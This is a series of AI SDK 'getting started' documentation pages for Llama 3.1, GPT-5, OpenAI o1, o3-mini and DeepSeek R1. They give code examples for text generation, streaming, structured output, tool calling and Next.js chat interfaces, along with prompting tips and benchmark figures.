Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

Claude 3.7 Sonnet opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.

title: Get started with Llama 3.1 description: Get started with Llama 3.1 using the AI SDK. tags: ['getting-started']

Get started with Llama 3.1

With the release of Llama 3.1, there has never been a better time to start building AI applications.

Llama 3.1

Benchmarks

Llama 3.1 Benchmarks Source: Meta AI - Llama 3.1 Model Card

Choosing Model Size

Llama 3.1 includes a new 405B parameter model, becoming the largest open-source model available today. This model is designed to handle the most complex and demanding tasks.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Llama 3.1 (using DeepInfra) with the AI SDK:

import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
  prompt: 'What is love?',
});

import { generateText } from 'ai';
import { bedrock } from '@ai-sdk/amazon-bedrock';

const { text } = await generateText({
  model: bedrock('meta.llama3-1-405b-instruct-v1'),
  prompt: 'What is love?',
});

Streaming the Response

To stream the model's response as it's being generated, update your code snippet to use the streamText function.

import { streamText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';

const { textStream } = streamText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
  prompt: 'What is love?',
});

Generating Structured Data

While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.

import { generateText, Output } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';

const { output } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Tools

Using Tools with the AI SDK

Here's an example of how you can use a tool with the AI SDK and Llama 3.1:

import { generateText, tool } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'What is the weather like today?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data, enhancing its ability to provide accurate and up-to-date information.

Agents

Agents take your AI applications a step further by allowing models to execute multiple steps (i.e. tools) in a non-deterministic way, making decisions based on context and user input.

Agents use LLMs to choose the next step in a problem-solving process. They can reason at each step and make decisions based on the evolving context.

Implementing Agents with the AI SDK

The AI SDK supports agent implementation through the maxSteps parameter. This allows the model to make multiple decisions and tool calls in a single interaction.

Here's an example of an agent that solves math problems:

import { generateText, tool } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import * as mathjs from 'mathjs';
import { z } from 'zod';

const problem =
  'Calculate the profit for a day if revenue is $5000 and expenses are $3500.';

const { text: answer } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  system:
    'You are solving math problems. Reason step by step. Use the calculator when necessary.',
  prompt: problem,
  tools: {
    calculate: tool({
      description: 'A tool for evaluating mathematical expressions.',
      inputSchema: z.object({ expression: z.string() }),
      execute: async ({ expression }) => mathjs.evaluate(expression),
    }),
  },
  maxSteps: 5,
});

In this example, the agent can use the calculator tool multiple times if needed, reasoning through the problem step by step.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and Llama 3.1 (via DeepInfra):

import { deepinfra } from '@ai-sdk/deepinfra';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            if (part.type === 'text') {
              return <span key={index}>{part.text}</span>;
            }
            return null;
          })}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.

Going Beyond Text

Let's dive into how you can leverage tools with AI SDK RSC to build a generative user interface with Next.js (App Router).

First, create a Server Action.

'use server';

import { streamUI } from '@ai-sdk/rsc';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';

export async function streamComponent() {
  const result = await streamUI({
    model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
    prompt: 'Get the weather for San Francisco',
    text: ({ content }) => <div>{content}</div>,
    tools: {
      getWeather: {
        description: 'Get the weather for a location',
        inputSchema: z.object({ location: z.string() }),
        generate: async function* ({ location }) {
          yield <div>loading...</div>;
          const weather = '25c'; // await getWeather(location);
          return (
            <div>
              the weather in {location} is {weather}.
            </div>
          );
        },
      },
    },
  });
  return result.value;
}

On the frontend, you can call this Server Action like any other asynchronous function in your application. In this case, the function returns a regular React component.

'use client';

import { useState } from 'react';
import { streamComponent } from './actions';

export default function Page() {
  const [component, setComponent] = useState<React.ReactNode>();

  return (
    <div>
      <form
        onSubmit={async e => {
          e.preventDefault();
          setComponent(await streamComponent());
        }}
      >
        <button>Stream Component</button>
      </form>
      <div>{component}</div>
    </div>
  );
}

To see AI SDK RSC in action, check out our open-source Next.js Gemini Chatbot.

Migrate from OpenAI

Here's how simple the migration process can be:

OpenAI Example:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('gpt-4.1'),
  prompt: 'What is love?',
});

Llama on DeepInfra Example:

import { generateText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'What is love?',
});

Thanks to the unified API, the core structure of the code remains the same. The main differences are:

Creating a DeepInfra client
Changing the model name from openai("gpt-4.1") to deepinfra("meta-llama/Meta-Llama-3.1-70B-Instruct").

Prompt Engineering and Fine-tuning

While the Llama 3.1 family of models are powerful out-of-the-box, their performance can be enhanced through effective prompt engineering and fine-tuning techniques.

Prompt Engineering

For more information on prompt engineering techniques (specific to Llama models), check out these resources:

Fine-tuning

To learn more about fine-tuning Llama models, check out these resources:

Conclusion

The AI SDK ensures that your application remains clean and modular, accelerating development and future-proofing against the rapidly evolving landscape.

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with GPT-5 description: Get started with GPT-5 using the AI SDK. tags: ['getting-started']

Get started with OpenAI GPT-5

OpenAI GPT-5

Prompt Engineering for GPT-5

Here are the key strategies for effective prompting:

Core Principles

Be precise and unambiguous: Avoid contradictory or ambiguous instructions. GPT-5 performs best with clear, explicit guidance.
Use structured prompts: Leverage XML-like tags to organize different sections of your instructions for better clarity.
Natural language works best: While being precise, write prompts as you would explain to a skilled colleague.

Prompting Techniques

1. Agentic Workflow Control

Adjust the reasoningEffort parameter to calibrate model autonomy
Set clear stop conditions and define explicit tool call budgets
Provide guidance on exploration depth and persistence

// Example with reasoning effort control
const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'Analyze this complex dataset and provide insights.',
  providerOptions: {
    openai: {
      reasoningEffort: 'high', // Increases autonomous exploration
    },
  },
});

2. Structured Prompt Format Use XML-like tags to organize your prompts:

<context_gathering>
Goal: Extract key performance metrics from the report
Method: Focus on quantitative data and year-over-year comparisons
Early stop criteria: Stop after finding 5 key metrics
</context_gathering>

<task>
Analyze the attached financial report and identify the most important metrics.
</task>

3. Tool Calling Best Practices

Use tool preambles to provide clear upfront plans
Define safe vs. unsafe actions for different tools
Create structured updates about tool call progress

4. Verbosity Control

Use the textVerbosity parameter to control response length programmatically
Override with natural language when needed for specific contexts
Balance between conciseness and completeness

5. Optimization Workflow

Start with a clear, simple prompt
Test and identify areas of ambiguity or confusion
Iteratively refine by removing contradictions
Consider using OpenAI's Prompt Optimizer tool for complex prompts
Document successful patterns for reuse

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI GPT-5 with the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('gpt-5'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Generating Structured Data

While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.

import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { output } = await generateText({
  model: openai('gpt-5'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Verbosity Control

One of GPT-5's new features is verbosity control, allowing you to adjust response length without modifying your prompt:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Concise response
const { text: conciseText } = await generateText({
  model: openai('gpt-5'),
  prompt: 'Explain quantum computing.',
  providerOptions: {
    openai: {
      textVerbosity: 'low', // Produces terse, minimal responses
    },
  },
});

// Detailed response
const { text: detailedText } = await generateText({
  model: openai('gpt-5'),
  prompt: 'Explain quantum computing.',
  providerOptions: {
    openai: {
      textVerbosity: 'high', // Produces comprehensive, detailed responses
    },
  },
});

Web Search

GPT-5 can access real-time information through the integrated web search tool:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'What are the latest developments in AI this week?',
  tools: {
    web_search: openai.tools.webSearch({
      searchContextSize: 'high',
    }),
  },
});

// Access URL sources
const sources = result.sources;

Reasoning Summaries

For transparency into GPT-5's thought process, enable reasoning summaries:

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai('gpt-5'),
  prompt:
    'Solve this logic puzzle: If all roses are flowers and some flowers fade quickly, do all roses fade quickly?',
  providerOptions: {
    openai: {
      reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
    },
  },
});

// Stream reasoning and text separately
for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    console.log(part.textDelta);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

Using Tools with the AI SDK

GPT-5 supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { toolResults } = await generateText({
  model: openai('gpt-5'),
  prompt: 'What is the weather like today in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI GPT-5:

In a new Next.js application, first install the AI SDK and the OpenAI provider:

Then, create a route handler for the chat endpoint:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('gpt-5'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat({});

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            if (part.type === 'text') {
              return <span key={index}>{part.text}</span>;
            }
            return null;
          })}
        </div>
      ))}
      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/cookbook to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/cookbook/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with OpenAI o1 description: Get started with OpenAI o1 using the AI SDK. tags: ['getting-started', 'reasoning']

Get started with OpenAI o1

With the release of OpenAI's o1 series models, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.

OpenAI o1

The main reasoning model available in the API is:

o1: Designed to reason about hard problems using broad general knowledge about the world.

Model	Streaming	Tools	Object Generation	Reasoning Effort
o1

Benchmarks

OpenAI o1 models excel in scientific reasoning, with impressive performance across various domains:

Ranking in the 89th percentile on competitive programming questions (Codeforces)
Placing among the top 500 students in the US in a qualifier for the USA Math Olympiad (AIME)
Exceeding human PhD-level accuracy on a benchmark of physics, biology, and chemistry problems (GPQA)

Source

Prompt Engineering for o1 Models

Keep prompts simple and direct: The models excel at understanding and responding to brief, clear instructions without the need for extensive guidance.
Avoid chain-of-thought prompts: Since these models perform reasoning internally, prompting them to "think step by step" or "explain your reasoning" is unnecessary.
Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input, helping the model interpret different sections appropriately.
Limit additional context in retrieval-augmented generation (RAG): When providing additional context or documents, include only the most relevant information to prevent the model from overcomplicating its response.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o1 with the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('o1'),
  prompt: 'Explain the concept of quantum entanglement.',
});

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('o1'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Refining Reasoning Effort

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Reduce reasoning effort for faster responses
const { text } = await generateText({
  model: openai('o1'),
  prompt: 'Explain quantum entanglement briefly.',
  providerOptions: {
    openai: { reasoningEffort: 'low' },
  },
});

Generating Structured Data

While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.

import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { output } = await generateText({
  model: openai('o1'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Structured object generation is supported with o1.

Tools

Using Tools with the AI SDK

Here's an example of how you can use a tool with the AI SDK and o1:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { text } = await generateText({
  model: openai('o1'),
  prompt: 'What is the weather like today?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.

Tools are compatible with o1.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o1:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow responses up to 5 minutes
export const maxDuration = 300;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('o1'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, error } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out our support for the o1 series of reasoning models in the OpenAI Provider.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with OpenAI o3-mini description: Get started with OpenAI o3-mini using the AI SDK. tags: ['getting-started', 'reasoning']

Get started with OpenAI o3-mini

With the release of OpenAI's o3-mini model, there has never been a better time to start building AI applications, particularly those that require complex STEM reasoning capabilities.

OpenAI o3-mini

o3-mini offers three reasoning effort levels:

[Low]: Optimized for speed while maintaining solid reasoning capabilities
[Medium]: Balanced approach matching o1's performance levels
[High]: Enhanced reasoning power exceeding o1 in many STEM domains

Model	Streaming	Tool Calling	Structured Output	Reasoning Effort	Image Input
o3-mini

Benchmarks

OpenAI o3-mini demonstrates impressive performance across technical domains:

87.3% accuracy on AIME competition math questions
79.7% accuracy on PhD-level science questions (GPQA Diamond)
2130 Elo rating on competitive programming (Codeforces)
49.3% accuracy on verified software engineering tasks (SWE-bench)

These benchmark results are using high reasoning effort setting.

Source

Prompt Engineering for o3-mini

Keep prompts simple and direct: The model excels at understanding and responding to brief, clear instructions without the need for extensive guidance.
Avoid chain-of-thought prompts: Since the model performs reasoning internally, prompting it to "think step by step" or "explain your reasoning" is unnecessary.
Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o3-mini with the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('o3-mini'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Refining Reasoning Effort

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Reduce reasoning effort for faster responses
const { text } = await generateText({
  model: openai('o3-mini'),
  prompt: 'Explain quantum entanglement briefly.',
  providerOptions: {
    openai: { reasoningEffort: 'low' },
  },
});

Generating Structured Data

While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.

import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { output } = await generateText({
  model: openai('o3-mini'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Using Tools with the AI SDK

o3-mini supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { text } = await generateText({
  model: openai('o3-mini'),
  prompt: 'What is the weather like today in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o3-mini:

In a new Next.js application, first install the AI SDK and the OpenAI provider:

Then, create a route handler for the chat endpoint:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow responses up to 5 minutes
export const maxDuration = 300;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('o3-mini'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, error } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out our support for o3-mini in the OpenAI Provider.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with DeepSeek R1 description: Get started with DeepSeek R1 using the AI SDK. tags: ['getting-started', 'reasoning']

Get started with DeepSeek R1

With the release of DeepSeek R1, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.

DeepSeek R1

The series includes two primary variants:

DeepSeek R1-Zero: Trained exclusively with reinforcement learning (RL) without any supervised fine-tuning. It exhibits advanced reasoning capabilities but may struggle with readability and formatting.
DeepSeek R1: Combines reinforcement learning with cold-start data and supervised fine-tuning to improve both reasoning performance and the readability of outputs.

Benchmarks

DeepSeek R1 models excel in reasoning tasks, delivering competitive performance across key benchmarks:

AIME 2024 (Pass@1): 79.8%
MATH-500 (Pass@1): 97.3%
Codeforces (Percentile): Top 4% (96.3%)
GPQA Diamond (Pass@1): 71.5%

Source

Prompt Engineering for DeepSeek R1 Models

DeepSeek R1 models excel with structured and straightforward prompts. The following best practices can help achieve optimal performance:

Use a structured format: Leverage the model’s preferred output structure with <think> tags for reasoning and <answer> tags for the final result.
Prefer zero-shot prompts: Avoid few-shot prompting as it can degrade performance; instead, directly state the problem clearly.
Specify output expectations: Guide the model by defining desired formats, such as markdown for readability or XML-like tags for clarity.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek R1 with the AI SDK:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { reasoningText, text } = await generateText({
  model: deepseek('deepseek-reasoner'),
  prompt: 'Explain quantum entanglement.',
});

The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use DeepSeek R1 via Fireworks:

import { fireworks } from '@ai-sdk/fireworks';
import {
  generateText,
  wrapLanguageModel,
  extractReasoningMiddleware,
} from 'ai';

// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
  model: fireworks('accounts/fireworks/models/deepseek-r1'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

const { reasoningText, text } = await generateText({
  model: enhancedModel,
  prompt: 'Explain quantum entanglement.',
});

Or to use Groq's deepseek-r1-distill-llama-70b model:

import { groq } from '@ai-sdk/groq';
import {
  generateText,
  wrapLanguageModel,
  extractReasoningMiddleware,
} from 'ai';

// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
  model: groq('deepseek-r1-distill-llama-70b'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

const { reasoningText, text } = await generateText({
  model: enhancedModel,
  prompt: 'Explain quantum entanglement.',
});

Model Provider Comparison

You can use DeepSeek R1 with the AI SDK through various providers. Here's a comparison of the providers that support DeepSeek R1:

Provider	Model ID	Reasoning Tokens
DeepSeek	`deepseek-reasoner`
Fireworks	`accounts/fireworks/models/deepseek-r1`	Requires Middleware
Groq	`deepseek-r1-distill-llama-70b`	Requires Middleware
Azure	`DeepSeek-R1`	Requires Middleware
Together AI	`deepseek-ai/DeepSeek-R1`	Requires Middleware
FriendliAI	`deepseek-r1`	Requires Middleware
LangDB	`deepseek/deepseek-reasoner`	Requires Middleware

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and DeepSeek R1:

In a new Next.js application, first install the AI SDK and the DeepSeek provider:

Then, create a route handler for the chat endpoint:

import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: deepseek('deepseek-reasoner'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            if (part.type === 'reasoning') {
              return <pre key={index}>{part.text}</pre>;
            }
            if (part.type === 'text') {
              return <span key={index}>{part.text}</span>;
            }
            return null;
          })}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Limitations

While DeepSeek R1 models are powerful, they have certain limitations:

No tool-calling support: DeepSeek R1 cannot directly interact with APIs or external tools.
No object generation support: DeepSeek R1 does not support structured object generation. However, you can combine it with models that support structured object generation (like gpt-4o-mini) to generate objects. See the structured object generation with a reasoning model recipe for more information.

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

DeepSeek R1 opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.

title: Get started with DeepSeek V3.2 description: Get started with DeepSeek V3.2 using the AI SDK. tags: ['getting-started', 'agents']

Get started with DeepSeek V3.2

